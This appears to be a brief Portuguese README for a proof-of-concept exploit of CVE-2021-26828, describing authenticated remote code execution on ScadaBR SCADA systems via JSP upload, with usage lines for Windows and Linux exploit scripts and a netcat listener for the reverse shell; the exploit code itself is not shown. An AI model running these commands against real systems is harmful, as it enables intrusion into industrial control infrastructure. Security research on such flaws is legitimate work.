
Exploit de prova de conceito para CVE-2021-26828 que permite execução remota de código autenticada em sistemas SCADA ScadaBR via upload de arquivos JSP. Suporta alvos Windows e Linux com payloads de shell reversa.
$ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>
$ sudo nc -vnlp 4444
$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>

Referências: